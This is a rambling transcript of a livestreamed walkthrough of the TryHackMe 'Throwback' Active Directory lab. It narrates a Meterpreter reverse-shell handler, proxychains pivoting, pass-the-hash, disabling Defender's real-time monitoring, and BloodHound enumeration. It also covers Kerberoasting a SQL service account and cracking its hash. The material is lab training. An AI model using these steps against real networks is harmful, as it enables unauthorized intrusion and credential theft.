 Trying to do some more twitch things so I got I got like the little green screen going on And I got the chat over there above me. This is really disorienting It's good to see everybody. Thanks for it. Thanks for coming to hang out We will do a little bit more Try hack me throwback I'm gonna catch up as to where we were last night but To get the chat kind of where it is looking at least relatively decent I wanted to make the screen actually visible and not like if you happen to be looking at a white screen I don't want that to be like shown and Be kind of tough to read the chat so I figured I'll just put it in the black background and then I'll just be hanging out over here in the corner but Then it kind of defeats the purpose of like me making this green screen So there is a green screen behind me and you can see like wow, it's it's it's I'm in a dark corner video editing That's not video editing but I could show you like the green screen behind me if you wanted to see like wow He's really he's really he's really doing it. He's really saying those words and those really make sense Let me show you this. I'll turn off the chroma key for just a quick second boom boom the illusions over Apparently it's just gonna Apparently like it's just gonna ruin my video though incredible That's the kind of thing it's like wow you could you could just Restart oh no, you can restart OBS and then it would look decent, but now it's just horrendous What the heck why did I even try to show you this? Why did I even bother wow a Truly a professional and you can see like so it's that it's the Dell XPS 15 cam. That's like goofing off down there All right, we're gonna do some drastic measures and we'll just we'll just nerf this webcam Yo, we'll cut this part out We'll cut this part out of the video Well edit this in post Wow, thanks everybody This is really what you came to see I know So we're doing throwback All right, everything's everything's better now We got a we got one more monstee we're to continue to continue to streak and I guess we'll I guess we'll do it. I don't remember really why I left off not gonna lie I'm gonna have to do a little bit of catching up Myself just to remind me where we are I Think we were about to do some like bloodhound which is super duper cool. I don't think I've done bloodhound since Sands hold a hack challenge. I don't remember what year it was that we had that. Hey, I'm alpha What's going on? Holy green screen and chat. Look. I'm a really I'm a real twitch streamer. I'm a real boy now. I'm cool So I should probably first of all connect to the network I don't really worry. There's like just gonna crap out again That's good to try hack me let's get to that throwback and let's Whack that VPN open My phone's going off already. Are you guys texting me while I'm trying to stream? Yeah, hopefully terminator actually lives to tell the tale today Network is running dope Can I ping production? Please don't be five hours today. What? Well, how many hours do you want? Okay, we can ping production. So that's a plus What else do we got? Where do we end up on I'm trying to remember like where I actually left off We got some Mimi cats logs where we found the ntlm hash for that Peters J user and Humphreys W from his old ntlm hash At least six hours. Yeah. Yeah We'll see how we do this is kind of the benefit of Having this nightly solitude for the weekend so We were on the box What what do we need to do with bloodhound? Now that you have a stable foothold on the throwback workstation 1 Your team has informed you that it may be I want to make this text bigger So you guys can see it, but I guess this is the best we're gonna do Maybe that's to enumerate what's on the workstation from the shells you've gotten from fishing in PF Sounds logs as well as a new shell from passing the hash Okay, so we did RDP into something. I Have remnant open for that. Was it production that we already peed into? You guys got to remind me you mean you don't have to I probably should have like taking notes But Peters Jay and the password. I think was 317 or 319. Oh boy, I don't remember Okay, it was 317 incredible and that works Let's make this a big screen and we also knew that we had saved credentials We also had star killer up and running with Empire and we ran some commands. We ran some modules so that we would be able to get We would be able to get logs and Mimi cat stuff etc etc You set up Cali on WSL last night with the winkey. It's pretty interesting. What is are you saying win kex? Kex intentionally or no, I don't know. How do you guys like this chat over there? I feel like it's taken up a lot of space I'm gonna have to I Feel like maybe it's just not showcasing your Messages long enough should I have like the always-on chat kex is a desktop environment for Windows? I'll look that up admin Peters Jay and Well, it was it was profile right and then we would just run cnb to the xe There we go Now I am Admin on Peters Jay, so this is at least administrative account which helps and I needed to do some bloodhound stuff So let's do that bloodhound is a graphical interface that allows you to visually map out the network using database visualization from Neo4j Bloodhound along with sharp hound or any bloodhound ingester takes the user groups trusts in more of a domain and collects them into dot json files and Creates a graphical database in Neo4j to view information of the network We'll be focusing on how to collect the dot json files and import them into bloodhound and to make basic and custom queries in Neo4j So we need to go ahead and install it I am on Ubuntu and I am not on Cali So is that actually going to be in my repositories? Part of me doesn't think that it will be I'll be honest Nope. Okay. How do I install bloodhound? Bloodhound Don't give me an actual dog. Thank you. Okay fantastic Bloodhound Ad active directory. That's good stuff. That's is really what we're really looking for. Oh, we just have binaries fantastic We should be smart about this one and actually just download the binaries rather than Trying to compile things like what we were doing with CME and the crack map exact the other day. That was that was rough. I Appreciate you guys that stuck with me for that, but let's go ahead and save this download it and let's make a Directory in my opt folder For bloodhound so let's move that downloaded bloodhound zip file and let's go ahead and unzip that Since I'm working on a new resolution for that other screen man. It really is is hard to understand what's happening That's one big op folder. Yeah, I got a lot going on in there. I will admit Let me turn on that always on chat because it looks like that like whole Right-hand side of the stream just kind of looks cheesy and stupid with Nothing there. So maybe I can make your messages like actually hang Make that stay Give me just a moment Please Please You like the chroma key. Yeah, so I'm trying to do those more twitch things Put some epic memes there. Oh, dude. You guys have no idea It will absolutely Do that save settings Now your messages will forever be visible Hopefully don't say anything bad or inappropriate Pretty please Yeah Actually, I don't know You know, oh gosh asking our palms fantastic Yeah We're doing a we're doing real twitch strings things. I'm a real twitch boy now I'm not I'm not at all. I'm not literally Okay, bloodhound is doing its thing Bloodhound is happening bloodhound is is running and then Neo4j console Should just do that Neo4j and Neo4j. Those are the only credentials. Yeah Sorry frantic alt tab Neo4j Save that password. It's super secure. Oh, we don't have a database running Oh, I guess I probably need to do that Neo4j thing. Do I have that? Should I actually have a database I'm confused I'm immediately confused To get started with bloodhound check out the documentation. That's what I'm gonna do graph theory Okay, I guess we need like databases, right Neo4j is separate if you want to install I need to install Thank you, Jaxmas. Oh man, I'm so glad you're here. Thank you. Where's Krillix? Neo4j that's got to be like in my repositories. I would think I would think that one would be at least on Ubuntu anything Neo4j clients Do I need the server? I feel like I need the server Well Which of the let me go to install. Okay. They should showcase it here. They add it into that Let's do it. I Don't think I need to get the latest job version But whenever I make those assumptions things go wrong So let's find out We'll charge right on ahead add this to you. Oh gosh. I have to sudo this Can I do a little tea? Suda or sudo tea this game So now it should be in there Cat that good. He's in there apt transport HTTPS I'll do that That should already be installed. It sounds like and then is Neo4j now going to be in my repositories No, oh Pluggy 11 trying to use some bot commands. I don't know how to do those things yet Yeah, Neo4j is not Apped update. Oh, you're right That should have happened and I didn't do it. Thank you. Thank you. Thank you chat Ominous external human being chat How have you guys been doing today? How's your Sunday been is it Sunday where everyone else is? Yeah All right, cool. Now we got Neo4j. All we had to do was run the sudo app update command obviously You guys just woke up. Oh man And it's Monday You guys are Time zones are weird. So when I stayed up late yesterday, we stayed up until maybe like four in the morning I think we started we we stopped streaming at like three and then I chilled played some like cybersmash brothers just to goof off and Then I went to bed and I woke up at two in the afternoon This is not normal. This is honestly not my Sleep schedule whatsoever. Now. Why did I stop this? Do they run it again? Sure? I'll stop it How many monsters do you have for later? This is the first one. This this is how I'm gonna prove to you guys like Oh, yeah, we're in this for the long haul once again Is it gonna be in? User bin is that we're actually put it a less Neo4j it did it. Okay, great And then I'll just run it in console. Will that work? What failed the server database was successfully initialized but failed to start. Oh, I probably need to sudo this thing Yeah, yeah, yeah, I see you I see you I see you guys in the chat. Tell me Run everything is rude Yo, I'm really sorry about that microphone issue earlier. All right. He's doing his thing Is that the right port? That's good. Just sudo as you. Yeah, everything's perfectly fine Good none of these text messages are important. Let me turn off my eye over chat We're keeping it real What Mike do I use this is an audio Technica AT 2020? People tell me that it sounds good. So That's why I use it You might need to visit the website though to set up your password And that's the thing that it says it's listening on right? Yeah Yeah, yeah listening to turn up. Oh I got you. So bloodhound suggested bolt Is that what it should be? What is the difference between bolt and Neo4j? Yep Bolt, okay Jackson was to tell me bolt. So bolt it is username and password and let's just do the Default things that this Recommends it's listening on local host. So I'm okay with it. Can I Just do that can't use an old password Did it just not do it? I'm confused. Let's try your bloodhound. We'll see it now Credentials need to be changed. I just did that or at least I tried to and then it yelled at me And the like the page just stopped We're doing it again Neo4j learning Let's use a super Good password Great Now we're doing it Okay, so bloodhound will just be able to do a thing at that point Let's Connect to it with bloodhound Success incredible And he's just walking along. Oh Beautiful incredible. All right now. We're gonna do some sharp hound stuff sharp hound was actually in the Binaries that we had downloaded yesterday. I thought right that was in opt and it was like the ghost Ghost back compile binaries. Yeah, we have We don't have sharp hound We have sharp other things Okay Let's go get sharp hound bloodhound ingestors Sharp hound dot exe and sharp hound ps1 the exe is probably What we need so I would move all of the following to their own terminal window. I would like Let them do their own thing Just like let them live. Oh Gotcha. Okay. Yeah, I mean that's a good point and that way they if the thing just crashes and dies then I Won't be hating myself Let me Make a directory for a sharp hound and then I will totally leave This one alone. I'll move this terminator session alone Just so I know I will set the Profile to something Useless And I know that this is not the terminal that I actually want to be interacting with anymore great Now I have a new and better terminal. Oh Thanks, Wester. I appreciate you hanging out. What's going on ethical kid? Welcome everybody. I really appreciate you coming to hang out Okay We have sharp hound. Oh, they did the ps1 file Can I do the ps1? Let's let's Should we try the executable? We already download the executable. So Let's get back to where we were and try hack me and hosts in production and Let's copy that op directories Sharp hound sharp hound and bring it over here. So now we've got that and then let's do some mHTTP They actually yeah, let's go for the executable. Give my IP address dope And then let's Start up a little server. We don't need to specify port. It'll do its thing Okay, so Excuse me now we can go download this thing I'm going to hop into PowerShell and then go to Peter's J's directory Gosh, I hate that. I can't actually clear the screen in this That's okay. I guess we'll just be looking at it real real low on the bottom So let's go ahead and download this we can use W get because that's a fine alias for invoke web requests Let's HTTP my IP address on port 8,000 and it's sharp hound that we need is a capital Let's let's use the capital H Did it do it? No It's not Wait, what wait what? The executable probably is getting like nerfed by Windows Defender maybe Yeah, yeah, everyone's saying go for the ps1 file and we can we that way we can just invoke it right away If I can get back to my screen here. So the ps1 file Is this going to execute the thing right away? Or do I need to specify it? I'm trying to find the invoke bloodhound and Just does it Collection method all is that how they invoke it? I think that looks like yeah, okay cool. That's exactly how they invoke it sweet. Oh And they use a bypass version interesting Let's see if this will actually stay on the box and not be Ripped Krillix good to see you buddy Can you hang out with us? Hi hi Hi, let's download sharp hound ps1 Let's I shot. I probably should have like done a push D and pop D to get back to Preve Startup that HTTP server again it should be dot server and now let's download that once again But we'll grab the ps1 file and let's see if that actually gets to keep its contents No, excuse me I'm wrong What What What where did I put that thing? Oh, oh, I didn't I didn't move it from opt yet ps1 do it There we go, and now we can download that Hallelujah Look at that actual content incredible so I'm in power show right now and they used a bypass profile. Oh Yeah, you're right. I Probably won't be able to just straight up want it run it. Will I let's find out Intest Okay, I guess it just did it I didn't need to specify the execution policy Apparently what is what is the execution policy? I can just look get execution policy I'm already running it with bypass apparently somehow. Okay. I'm good with that. You know what we're fine so They just ran it and that would bring all the functions in the scope and then we saw in this source code when we were looking at it There they offered the example syntax so the collection method that we can pass I guess is all the domain for throwback and then we'll specify a zip file Loot, okay, and then we can pull it back down When they use SCP to get it back to us What what is this supposed to be doing? I'm confused what that command is SCP loot. So you're bringing loot over to a Workstation one and just putting it in there. I guess so I guess so Yeah, I know I understand it's just transferring the file But it's bringing I thought you would want that loot information over on your attacker machine. Oh Crillix is telling me that might actually be wrong Okay, let's do it. Let's just run the command then I'm running this on production. Should I be running it? on the Ws1 I think that answers my question. I Probably should be in WS1. Shouldn't I be? Oh? Well We have credentials for WS1 Do I need to be running as an administrator on that because I think all we have is Blair J Or Humphreys that previous section was telling me When we did some past the hash and we did CME Any domain user is fine. Okay, great. I'm running it in a local user. Oh I You're right. Sorry I'm doing this in my I Was doing it as the admin Peters J user currently inside this command prompt. I am adding Peters J Which is just a local admin As far as I understand There's a way I can find that out Yeah Let's do it from this power shell Let me check the execution policy as I do that. I Still bypass great. Let's run him And try that one more time. No What check if you're in a domain context is this wrong because I'm running it on production on prod should I be in WS01 because Chronologically that's where we previously left off so What was Blair J's hash? Got evil win our M over there. Takai 10 224 222 user was Blair J And her hash we can track down. Oh We actually have her like legitimate password. Oh Okay, good. I'm glad I'm glad Krillix is just as surprised as I am Even when our M you got anything for me You got any news Did I specify like a port or something with that lowercase p should that be wrong? No, it's password We'll use the NT hash We'll use her hash then Whack, I'm bad at this the server has rejected the client credentials What try this on PowerShell credential equals new object system management automation PS credential get credentials to get credits Can you try the creds on the AP address that ends with 219? Yes Let me let me Let me try to do that evil win RM over to production. So that is just going to be running Did I break the domain controller? No, I didn't even touch the domain controller. Oh, okay so evil one RM with Pass the hash Will work for Blair J on 219, but it didn't seem to work on 222 on WS01 That is what I was looking at right and Libby cool is Suggesting that I go ahead and take a look at credentials here Where I try and specify them Was 222 blocking connections? I'm just confused why That isn't happen. Oh, you're right. I'm sorry. Oh my gosh. I'm sorry. I didn't need a proxy change that I'm pretty sure I need to set up all the proxy chain stuff again, or I could just use this SSH tunnel thing. You're right. We forgot about proxy chains. Gosh darn it We should use the actual We should use actual proxy chains and not just SSH tunnel. So Let's we have a interpreter in here. Don't we or I thought we did We have something we have MSF console. Let's think and start that up at the very least Let's oh, I think I already downloaded that on that box Yeah over on this machine I do have in Windows temp unless it's died unless that yeah met is still there So we still have our interpreter from the other night With that said we can use multi handler over here Excuse me and set the payload to Windows and interpreter reverse TCP and That I managed to get SSH tunnel work. That's like, yes. Yeah, we did. Yeah, I thought we did. Were you were you there? L host Ton zero for my p address lots of typos and 4141 is what we rent with yeah, no worries. I totally understand and That's getting us into Purdue or WSO one, which is good. We could also background this and Run met here. No, I have to dot slash it Do I need to run that one more time? Okay, now 219 is a thing Now we're on 219 in session two. So Great Sorry, rookie. I appreciate you coming to hang out. I Appreciate you come to explore with us. I'm still learning like this whole thing set exit on session false. Oh Oh, I follow for that I Apparently just sent money to Nintendo so that I could continue my Nintendo online subscription. Thank you PayPal for giving me the notification Yes, use auto route auto route I need to know Fantastic, I think I just need to set the session right set session to and set Subnet 10 224 slash 0 slash 24 do it. Okay, great. Now. Let's use that socks proxy Now I have to search for this every single time Search socks for a Why can't it just use that I can't know that that's what I'm referring to why don't I run LS? So is that show options and then it's good? Do the thing? Okay, with that now I should be able to proxy chains over to to to with her password Well, that one work Will that just do it or do I need the hash? This is apparently taking a little bit of time regardless we do have we do have access to to to to w s 0 1 because of interpreter so We just we had that original callback with the phishing email back when we were looking at squirrel mail Proxy changes just not letting that happen Maybe that box Can't do that for some reason Trying to get on WS 0 1 It's not doing much for me Okay, is this shell still alive? Oh You're right. You're right. You're right Yeah, when RM might not be on it, but probably SSH is if it's a Windows 10 machine I don't know if it's gonna be open, but I guess it's worth a try So SSH Blair J at to do to Yeah, my network is probably just kind of crapping out and we should give it some time I'm totally cool with that Let me do that after we see if we can Get into this with a password No, do I need to specify like a domain for using that login if that would be weird to me. I Don't think I've ever seen that with SSH Do what is that a thing I Feel like that's not a thing. Oh, oh, I just put Blair. Thank you gosh You guys are the best Can I log in amazing Okay, okay We're all good Let's try and see if this can get Sharp how to work Because this is just a regular domain user Let's do it If I run PowerShell will it behave? Yeah, okay So, let's W get HTTP my p address which is 1055 something 1050 225 I will someday remember that Proxy chain sometimes doesn't like win RM. That's good to know Now that I know that Sharp hound Dot ps1 And let's see if this will behave Gotcha, I am just going to be lazy and Totally steal the Suggested one on the website In book bloodhound collection method all in specifying domain And then crank that out Nope, that's RDP. I don't want to be in the RDP. I want to be in my SSH session Whack. Oh Got a stinking run that What is my execution policy unrestricted I do what I want You suck you're right. Do I need the exe now? Is that what I should have done earlier let's grab that exe and see if it actually loads nope won't do that either Okay, so Let's just run it through Memory right we can try that If I do a little new obj net dot web clients I can Download the string of HTTP 1050 22.5 8000 and run it Still doesn't like it What could I just turn off? It's anti virus right it's windows defender that's telling me I can't run this thing realistically, I think we should be doing this on prod and Krillix kind of mentioned we should probably bounce the network maybe I XL are vii. Yeah, it has zero bytes because I think Defenders just gonna remove it you could just disable defender. I'm just a poor poor domain user Can I actually do that? Are you are you joshing with me right now? Is that a thing? PowerShell disable windows defender. I I'm a local admin I'm not a local admin. Am I a local admin? I don't think I'm a local admin I'm a local Am I literally am I actually What? set mp so libco local I don't I I'm sorry. I'm gonna butcher your name Is passing a long this little command That might very well Turn off real-time monitoring Disable real-time monitoring Robin. Hello. What's going on do it? He did it. I Think Can I get that preference and is that gonna be like an actual thing real-time? Monitoring disabled real-time monitoring is now true. Okay okay Can I replace that sharp hound executable now? Well that just work No Nope, I still have zero bites here Lamo Maybe I can run sharp hound up he has one I Can run sharp hound up he has one that was awesome Super cool. Okay Now we could try to actually run in invoke blood and it's doing it. I Think I hope It sounds like things are happening bro the green in the monster is being demolished by the green screen That's so funny sharp hound enumeration completed Okay, so now I have a loot Dot zip and this incredible dot bin file That's great. What else we got I guess I can just kind of pull this down now. Can I so I Could proxy chains SCP right proxy chains SCP Blair J at 10 224 222 on Users Blair J this thing and just bring it here And now we need her password Do it do it do it. Yes. Okay. Awesome. Okay. We got the loot We have successfully done our enumeration that bloodhound it needs and Now that bloodhound is running we could upload this zip file and do it So bloodhound I need to hit this import graph is that right? Uh CTF Yeah, I could just drag and drop the file. You're totally right. I Put it in prod didn't I yeah Bad Jason file Let's drag and drop the file. Maybe it'll just kind of know what to do with it Go what Ubuntu version is John using I'm using Ubuntu 20 oh for currently Finish processing all of the files Great Now what to view the graph network open the menus like queries This will give you a list of pre-compiled queries to search from queries Find me the shortest path to domain admin. Oh boy. Oh boy, so I don't fully understand what I'm looking at yet default domain policy has a GPT link and This user because that's a CID isn't it? labmaster contain spooks and Spooks is a member of domain admins group any of these Realistically are Mercer H What is this guy? Oh admin and throwback the local that makes sense This user or this CID Am I saying that right? I should ignore the lab master What is is the lab master just like a thing Bloodhound has many queries utilize such as look for domain admins Yeah, tell me who is cool Mercer H task MGR Spooks Administrator, and that's it. So I need Mercer H Spooks or Task manager it sounds like Task MGR. I look I don't know Am I not seeing things that I should see because this screenshot is not the same But I guess it's a completely different domain. I'm using Ubuntu 20.04 in my case What service account is Kerber hostable? Bloodhound can figure that out List all Kerber hostable accounts That sounds good to me SQL service and the Kerber host ticket the SQL service I can zoom in and out on that. That's very fun. Okay Yeah, what domain does the trust connects to? map domain trusts Corporate corporate dot local and I've seen that in the actual Like network diagram that you see at the very very top of this lab here What normal user account is a domain admin? Spooks How can I tell what's a normal? account Hans Mercer Yeah, okay. I see acrylic says that's a screenshot of the different lab just to give examples Good enough good enough. Oh That guy has a flag Mercer H has a flag I don't know how I missed that Noted that real quick Directive local admin rights Let me see if I can just slap this flag in here somewhere. What is the account description flag? I should like oh I should have figured out that user flag on here. I am actually still on that aren't I I'm still on WS, so desktop dr No, she's root. Yeah, she's a 9c5 I have that don't I do I not have this what? I probably wrote it down elsewhere. I think this is like number nine Is that right? Yeah What is the root flag on throwback? WS-01 sorry, I realized that I'm kind of falling down different rabbit holes right now But I just wanted to make sure that I get those I Realize I'm being distracted for my original bloodhound task Let's Go get the user flag so I am going to Get Child item Recurse Where the name is equal to user dot text and that is in Humphrey w What what bot command should I have for twitch guys because I see you guys throwing These exclamation points and I'm not twitch smart I This is the second stream that I've done on to which so We keep it real Nightbot is typically just the thing Okay, I'll do some of that Get back to bloodhound where we at what is this description that I need to be caring of I Think I mentioned I thought I saw it say description What is the account description flag on DC zero one so that's got to be it number 15. Yeah, okay Snag that You guys look like you're having fun though, I appreciate you guys working in the chat. I'm glad we got it going in the video We're trying to amp up some of those twitch achievements so that way we could I Don't know get that affiliate status, you know What is this B8 one? Oh, I just Randomly copy that that's fine. Great We were still doing bloodhound. Let's get back to bloodhound We needed to know What normal user account is a domain admin is that Mercer H? Yep is Mercer H My phone is going off Chill stream time Some people watching the other video John isn't elite Haxer. He doesn't use team X and Cali. That's true I've never considered myself elite Haxer. I Literally say that I'm a script kitty Upon looking through bloodhound careers your team believes that they have might have found a sequel service account That you can Kerberos and possibly use to gain access to sequel databases in the future. I Shouldn't immediately Just turn myself off from bloodhound. I do want to kind of look at other things that this can do What is that DC sink rights? What are DC sink rights? These roles have replication permissions that include the following rights Enable a DC sink attack Replicating directory changes replicating directory changes all So that's a known attack a DC sink attack impersonate a domain controller ah Yeah, I guess I can understand why that might be a bad thing how the DC sink attack works hmm you have Oh, sorry acrylics. Oh, I'm reading on ahead more than I should be you sink two different domain controllers So if you have full access to one you can have access to the other that's cool Yeah, sweet. Let me put it away if the if the class is going to teach me if I'm going to get schooled on my own then Upon looking through bloodhound careers your team believes they found a sequel service you can Kerberos Yeah, oh, I'm so excited. We'll get to do some Kerberos thing. I haven't done this before It's one of those things like you hear it all the time, but I'm just not that cool Kerberos thing allows you to request a service ticket for any service with a registered SPN And then use that ticket to crack the service password hmm If the service has a registered SPN, what is SPN? Do we define SPN and I just not know it SPN SPN SPN We did this earlier. Oh, no. No, this is no service principal name Service principal name Thank you chat Service principal name is unique identifier of a service instance SPNs are used by Kerberos authentication to us associated service instance with a service logon account This allows a client application to request that the service authenticate an account even if the client does not have the account name okay okay, so this Is it is it fair to say if I read this that a Kerberos thing attack does boil down to password security like I'll press the I believe button on the SPN the service principal name if a service has that It's using a service password, but the complexity of this attack barring that is just Based off the password. Is that right? Am I understanding that right? To enumerate Kerberosable accounts, you can use bloodhound to find all of the Kerberosable accounts Oh, sweet. Yeah, the attacking Kerberos room goes way in depth in this cool Hopefully we can tackle that after this thing To enumerate Kerberosable accounts use bloodhound to find all the Kerberosable accounts Great and that will allow you to see what kind of accounts you can Kerberos that's an incredible sentence If their domain admins what kind of connections they have to the rest of the domain Okay, if you want to look for what you're looking for look for what you're looking for and you'll find what you're looking for I'm not hated. I just I think that's fantastic Impact releases have uns have been unstable Oh, I think I heard yeah, I heard the cyber mentor saying this same sort of thing in one of his streams 0.9.2 0 was like getting wonky What version of impact it do I have? Impact it in impact it. Yeah that thing. Nope from the command. Okay Impact it How do I know how do I know what version I have? Is there a regular command? I guess I could just kind of Check the read me or the changelog. Yeah, you guys are right version Version version version. That's it great. How about that changelog? 0.9 15 Am I using way old? Oh, I guess I could use pip but I'm sorry pip three No, that's the pip version You're trolling me That's fine I'm assuming under the changelog That it was this 15 So I don't think I am In the wrong right now. So Gotcha Kerberosing with impact it we have a get user spn's And we want a proxy chains that How did we get to 117? Where did we randomly choose that ip address? Is that just the sequel server? Can I use rust scan with with proxy chains? Proxy chains rust scan 10 200 of 24 117 Probably not Let's do a little end map Oh god proxy change is going to be like here's everything Oh, yeah, that has a 3389. So I will trust that that is the sequel server team view select rough We had A list of hosts that we gathered Earlier and 117 was in that list And that was 3389 we could scan some of those If we wanted to it's actually the domain controller, excuse me This proxy chains output is tough to listen work through It has port 80 open It has SSH 139 445 So Okay Oh, you're right. I'm sorry Yeah, I I misspoke. I said rdp. I said 3389 is rdp. I meant 3306 Or 3036 what the hell am I saying? My sequel port 3306 Yeah, thank god I don't look like all that much of an idiot so Okay, we found like make believe we found the Domain controller we know its ip address as 117 Would I be using this get users spn on strictly that? Or is that going to be I guess so I mean you're just passing it as the dcip Do you always run that get user spn's on the domain controller? Or can you do it on like another? machine that Is running a service Like if I had found the actual sequel server, could I specify that for get users spn's? Okay, and any valid set of credentials? That's crazy So I could use blairs Try with some frets Okay I I will believe that that is the domain controller. I'm fine with that and I'll use get user spn's python python three and We need to specify the dcip address 224 117 and You specify domain and a user. What is this tack request? throwback Dot local slash Blair j. Let's use hers just for the sake of learnings And slap that bad boy in and request Does he do it? Request request a service to stick it. Oh, I need to stink in proxy chains I think I'm pretty sure Oh, shoot. Yeah, is that version off? Oh, no I mean it gave me a ticket. So Gave me one from sequel service acrylics. I'm happy to hear that. I'm glad that this is uh actually kind of helpful for you guys I was thinking about going through it because like well, I'm going through and reading everything. It's easy for me to be like That's spelled wrong that grammar. Does it make any sense? And it's just easy to be like a poopy Debbie Downer negative Nancy Poopy Patricia But I thought like let's make it. Let's make a uh Let's make a Pull request for throwback like fix everyone's typos and like no, that's a horrible horrible idea Um Okay, now we have a thing We have this ticket Right That's the best way to refer to it What is this What is the best way to refer to what I actually just received? Is this am I understanding that this is a ticket? No, I totally get you. I'm playing with the acrylics. Obviously trying to write 37 tasks Is no easy thing and I mean you've done an incredible job going through all of this So thank you for for putting up with me Badgering you with questions No, dude, I'm teasing you. You're good All right, we've got a hash anyway, so let's uh keep track of this I What I'm I'm struggling to know what to call this though This is credentials for the sequel service sequel service hash Kerberos hash just slap it in You said write instead of write and it makes me mad Yeah Granting ticket hash. Is that right? Is that is that what I got cake fuming? This is sequel service Yeah, yep. Yep. This is definitely a sequel service thing. So Let's get my collab cat going again Here we go Can I Go back to the collab cat that I was in Oh god, I'm super zoomed in I don't want this. Oh no. Oh no. Oh no I'm just gonna make sure that I've got this collab cat stuff set up again I think I can revisit the same thing that I already had opened I think Let's find out acrylics Congratulations. Oh, yeah, I need to do the authorization things again uh Let me do that real quick. Sorry allow allow I'm I am very happy to learn about collab cat though. That was kind of this has been very very much kind of cool This is new for me That failed to do it. So Once again, the author the authorization code didn't get it right The same thing it was like giving me trouble in the last stream yesterday I'm gonna see if I can do this again Do you think Do you think normal hash cat will be able to crack this fast enough in my case? Or my I'm gonna like ruin the stream again as usual What the f There's a thing. Yeah, I don't want to do I don't want to do that locally at the moment So I go to this thing And I get the code And I paste it in And it tells me it's wrong Why I don't know what the I don't know what the obsec is a concern is In this case Yeah, I'm seriously. I'm doing this over and over again fit times the charm It's frustrating If only we had gotten to this part last night when collab cat worked properly Oh my gosh, it actually did it You know what I think happens I think When you click on What google has that little uh copy clipboard icon for you. I feel like that copy is like the wrong thing Or it doesn't Do it Or or it doesn't actually copied into your clipboard. So when I like highlighted the text it would work just fine Just that like when I did that locally it behaved. So Now we'll let uh now we'll let hash cat do his thing Nightwolf, what's up? How do you think what do you think? I feel like the the green screen thing is kind of weird, but it's good to have the chat I wanted to have the green screen where over my video where it usually is so it looks like a little bit I don't know cool fancy, but then me trying to put the chat in there If it were that it was the text over a white Screen that it would be really hard to read and it would just kind of suck So I figured like let's go for a lower resolution video and have that off of the side So you can see the chat and me chatting It kind of like takes away the Beauty of the green screen though is if I have a black background all around me. That's that's not as fun So so we got to get past two hours To be able to reach that eight hour achievement for Eight out eight hour achievement for streaming and getting into like The twitch affiliate thing or whatever So We did six hours and 11 minutes yesterday and because we went over we crossed the timeline of One day and to midnight it counted as two days So we already have the okay stream for like however many days in the 30 day period So yeah, we're gonna be we're gonna be pretty easy easy breezy Beautiful cover girl on all those other treats achievements So I'm grateful for uh Appreciate the support trying to make some of those twitch things come through People told me like it'd be really cool to hang out on twitch because I feel like a lot of times when I do youtube videos, it's a very it's a very very prepackaged Like obviously i've done the room before i've done the machine or like i've already kind of figured out What to do and you can like it's an act right it's a show Yeah, so when I get to stream with you guys it's Me being a little bit of a goofball and me totally failing repeatedly and Letting terminator crash and recovering From things going wrong. So just a different feeling a little different vibe Yeah, that's exactly there's no fourth wall here. That's a good point. That's a good way to say it and when I uploaded the Previous part of this onto youtube. I think that was kind of well received, but I did that strategically to like Slightly pull some of the youtube audience into this Okay, uh, don't actually run that actually Yeah, thanks. Let me just actually now get A regular bash command prompt here You sneaky john I am root. I have hash cat I still can't see what I type Incredible so I want to get into my drive and Dot hash cat If I type that right no Where did it put all this? It did it. Oh, it's in drive my drive dot hash cat Oh I know that I fat fingered that I can just absolutely tell I hate that. I can't see I still didn't do the reverse shell. This is not entertainment. Can I do the reverse shell honestly? I'd have to like get into my BYOB server or like run n grok and that wouldn't be that much fun I could n grok, but I've actually never done n grok before That would be weird too Or I could just hop over to my server mmm Let's not though. Let's not Do a reverse shell on on google stuff CD drive my drive We did it All right. Now we got all this stuff. So let's echo literally all this into ticket dot text Can I cat out ticket dot text and it has all the output It does ooh It tried to use some bash Variable expansion in there because I didn't use single quotes I can see that right away and already know that's wrong Now let's check out ticket. There we go. Okay. Now we've got the the full string in there um What is this suggesting that I do what hash is it going to end up using what hash type hash cat types Kerber rose kerber rose kerber rose What does mine look like? five tgs And 23 let me search for that 13 100 is that what they suggest? Yeah, it is amazing Okay And we do still have Rock you in here. So we can hash cat tack m 13 100 ticket dot text with rock you dot text And He's cruising I think doing his thing Gotcha Now if I scroll all the way over We have a cracked password of my sql 3375 7 0 Nice Oh, yeah, don't know how you're doing the commands blind. I would just copy and paste them. Yeah I don't know. It's trusting that I can type okay cracked password for sequel service account I had a question mark because I'm not 100 positive. What account was compromised by kerber hosting? sequel service My sql 3 7 7 5 7 0 Uh, I forgot that number 3 3 7 5 7 0 Gotcha Alrighty You're five minutes late Oh goodness after doing everything that you can with your initial footholds Your team thinks it is time to look at other resources and services that we have opened while moving through the network Since these are internal server Since these are internal server We will need to run your browser through a proxy chain with foxy proxy to forward your traffic through the proxy server We can use cme again along with the proxy server to find all open servers run cme again to find what devices are open well We ran the ARP scanner to See all the machines Yeah, i'm alpha dude. You didn't even see what we were doing the other day We got a we had a monster. We had two monsters in the day. I opened the other I opened the second one at like one in the morning So We're different long haul It's three at 3 30 am where you guys are so We do have that throwback time time keeps server um I do remember this time keeps email. We should go find that box though. Which of these Which of these is the time keeper I mean like a internal hosts dot text file and then Let's clear out all these guys Um, and let's actually make each of these New lines a comma I don't think I need to care about dot one though or the 25 because that's going to be a broadcast so Let's proxy chains nmap tech v All of these to Uh God what I can get I can normally get a hostname with SMB right so if I were to use tack sc and tack sv and specify port 4 4 5 I should at least maybe give me able to get a hostname I think that's a fair assumption And then if I use taco and I can save this in nmap internal Right Let's try it Some of these closed Was that useful whatsoever? I honestly don't know Can I smb map? Probably Is the network down again? I don't think so I should extend it though if I have 45 minutes left we'll amp that up he's still uh He's still running And I don't need that dashboard in the way I would have expected Something to respond though Is my nmap syntax wrong Let's just use one of these And I don't need to do that What if I did it? Yeah, I could we could do the whole subnet, but that would just take forever Right Multi-gatherer resolve hosts What does that do? Oh, that's true if I'm looking at just one port it probably wouldn't take all that long I'll I'll spin it up use that that slash 24 and see if we actually get any hits Uh That might not be what I need in in metasploit I'm trying to see what I could do to get some of the smb names can crab map execs exec do that CME get host names with smb Yeah, I'm looking for time-keep. Sorry. I'm trying to find the uh The machine that it is I'd like to be able to smartly go ahead and figure out Does it really? Even am I specified like all the ip addresses? If I don't supply anything to CME does it just like look at things? Let me try. Let me just let me just try it and find out opt CME smb And I didn't do anything because it needs arguments. I'm assuming I'm gonna sneeze stand by Thank you for notifying me that I'm still muted I'm not good at this Well, now we're like looking at stuff I think You know what is an even better idea? is to end map these on port 80 and See which of them actually will tell me their title And which of them will tell me like 